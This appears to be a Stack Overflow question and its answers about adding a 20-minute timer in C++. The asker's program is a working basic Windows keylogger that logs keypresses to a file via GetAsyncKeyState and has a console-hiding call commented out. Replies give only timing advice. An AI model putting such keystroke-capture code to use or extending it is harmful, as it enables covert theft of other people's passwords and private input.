# How do I create a timer for the program with clocking?

Tags: c++, c++11, time.h

I am trying to make a basic keylogger, and I want to be able to close the program after 20 minutes. looking online I found this clock_T functions, but I can't figure out how to transform this into seconds (and from seconds I will be able to make mins).

I tried to use the good old timer based on the "sleep" function.
but it gave me a huge amount of problems considering that I must be able to type anytime and save it in a log.
I am not able to understand high level of coding, therefore I struggled quite a bit looking at videos or descriptions on the internet.
    I was expecting to see displayed the seconds increasing over time, so I would later on be able to shut down the code once the desired amount of second would be reached, but I instead ran into a spam of the same number for the specific second.
    example: 1111111111111111111111111111111111 (after one second it increases)22222222222222222222222222222222 (increases again) 333333333333333333333333. and so on.

```
   #include <iostream>
    #include <string>
    #include <Windows.h>
    #include <fstream>
    #include <time.h>
    using namespace std;

    int main() {
    //  FreeConsole();

        clock_t start = 0;
        clock_t end = 0;
        clock_t delta = 0;

        start = clock();

        fstream info;
        string filename = "Data.txt";


            while (true) {
                info.open(filename.c_str(), ios::app);
                for (char i = 31; i < 122; i++) {
                    if (GetAsyncKeyState(i) == -32767) { 
                        info << i;
                        cout << i;
                    }

                }
                info.close();
                end = clock();
                delta = end - start;
                delta = delta; // 1000;
                std::cout << delta/CLOCKS_PER_SEC << endl;
            }
            return 0;
        }
```

Comment: Why not use the plain old [`time`](https://en.cppreference.com/w/c/chrono/time) function? On all PC-type systems it reports the number of seconds since an epoch. Since it already returns a value in seconds just divide the delta with 60 and you have the number of minutes. When it's above 20 then break the loop.

Comment: On an unrelated note, why open the file each iteration of the outer loop? Open it once before the outer loop let it be closed when the program exits.

Comment: Lastly, don't do busy-waiting like that. If you do it at least put in a small `Sleep` call to not starve the other processes to much.

Comment: You might want to look at the `chrono` library. Use them to calculate the current time and the elapsed time. Then you would want to place that into a while loop and loop until the time elapsed becomes equal to the total time allotted then break from the loop to exit your application. You can then use the `chrono` library to convert between milliseconds, seconds, minutes, etc.

Comment: thank you guys for the suggestions! I tried to do as you suggested some programmer dude, but I won't work! it's not clear to me how to relate the epoch seconds to my seconds! (i don't have any variable storing seconds). and to answer your question about the .open/.close, I did it that way so the loop will do 2 things at the same time, which is checking each character and convert it into human language from ASCII, and to actually print it out in the log.  Also, I tried to give a look at the chrono library, but it seems to mostly work with smaller units than sec, which is kinda pointless for me!

Answer (score 0):

I have this class template that uses the `chrono` library. Here is a simple example of its use.

**main.cpp**

```
#include <iostream>

#include "Timer.h"

int main() {

    while( Timer<minutes>(1).isRunning() ) {
        // do something for 1 minute
    }

    while ( Timer<seconds>(30).isRunning() ) {
        // do something for 30 seconds
    }

    return 0;
}
```

**Timer.h**

```
#pragma once

#include <chrono>

using namespace std::chrono;

template<class Resolution = seconds>
class Timer {
public:
    using Clock = std::conditional_t<high_resolution_clock::is_steady,
                                     high_resolution_clock, steady_clock>;

private:
    Clock::time_point startTime_;
    Clock::time_point timeToRunFor_;    
    bool isRunning_ = false;

public:
    explicit Timer(int count) :
        startTime_{ Clock::now() },
        timeToRunFor_{ Clock::now() + Resolution(count) },
        isRunning_{ true }
    {
        run();
    }

    ~Timer() {
        const auto stopTime = Clock::now();
        std::ostringstream stream;
        stream << "Time Elapsed: "
            << duration_cast<Resolution>(stopTime - startTime_).count()  
            << std::endl;
        std::cout << stream.str() << std::endl;
    }

    bool isRunning() {
        return isRunning_;
    }

private:    
    void run() {
        while (steady_clock::now() < timeToRunFor_) {}
        isRunning_ = false;
    }
};
```

**Output**

```
Time Elapsed: 1

Time Elapsed: 30
```

Time waited for first about 1 minute then printed 1, then waited for about 30 seconds then printed 30. This is a nice light weight class and is simple to use.

---

I'm currently in the process of adding more to this class to give support for manual starting and stopping usages with a default constructor. As this class currently stands above you could create an instance or an object of this class as a variable, and give it a time explicitly and it will run for that long, but you can not manually start and stop this timer when you want to. Once I finish this class, the default constructor will not use the internal members `timeToRunFor_` and `run()` as they are meant to be used with the explicit constructor version.

Once completed you can set how long you want something to run for via the while loop then terminate after desired time has expired via the Explicit constructor version, or you can create a local instance of this class as an object, invoke the start function, do some other operations for and unknown amount of time, then call the stop function after and perform the query of the time elapsed. I need a little more time to finish this class so I will post this as is for now and once I complete my updates to the class I'll update it here to the newer version!

Comment: I tried to include the library Timer, but it won't work, it just says "cannot open source file "Timer.h"". it's such a shame! your solution feels like the easiest yet the most practical :(

Comment: @Teddyino01 Timer is not a library it is a header file that I wrote. It uses the `chrono` library. You will need to create a new text file and name it `Timer.h` in IDE.

Comment: @Teddyino01 When you look at the `#include` directives there are two types. `#include <filename>` and `#include "filename"` Normally the ones that have the `<>` are looking in the system folder directory that is setup when you installed your compiler or IDE. The one that has the `""` normally looks at the files within your current project or solution directory. So when you include any of the standard libraries such as string vector etc. you will see `<filename>` but when you write your own headers, you will then use `"filename"`.

Comment: ohhh that's a lot more clear! but even if I do so, and create a text file in the IDE folder, I just have to paste the timer.h code that u sent in order to make it work, right?

Comment: @Teddyino01 you will end up having 2 files in your project's directory. `Timer.h` and `main.cpp` they should be in the same directory! So you can find where `main.cpp` is and add `Timer.h` to that same folder, then load that file into your IDE and copy and paste the code from what I've shown above.